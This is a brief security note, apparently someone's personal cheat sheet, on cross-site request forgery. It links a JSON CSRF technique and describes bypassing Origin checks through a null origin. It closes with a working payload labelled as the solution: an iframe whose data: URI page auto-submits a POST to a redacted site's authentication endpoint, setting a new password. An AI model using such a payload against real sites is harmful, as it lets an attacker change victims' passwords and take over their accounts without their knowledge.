Cross Site Request Forgery (CSRF)

JSON CSRF - http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html

Origin Check bypass for CSRF.

Firefox : works Chrome : if server allows Origin: null

Got the solution :
<iframe src='data:text/html,<body onload="document.forms[0].submit()"><form action="//redacted.com/api/auth?password=Chang3dd" method="post"></body>'></iframe>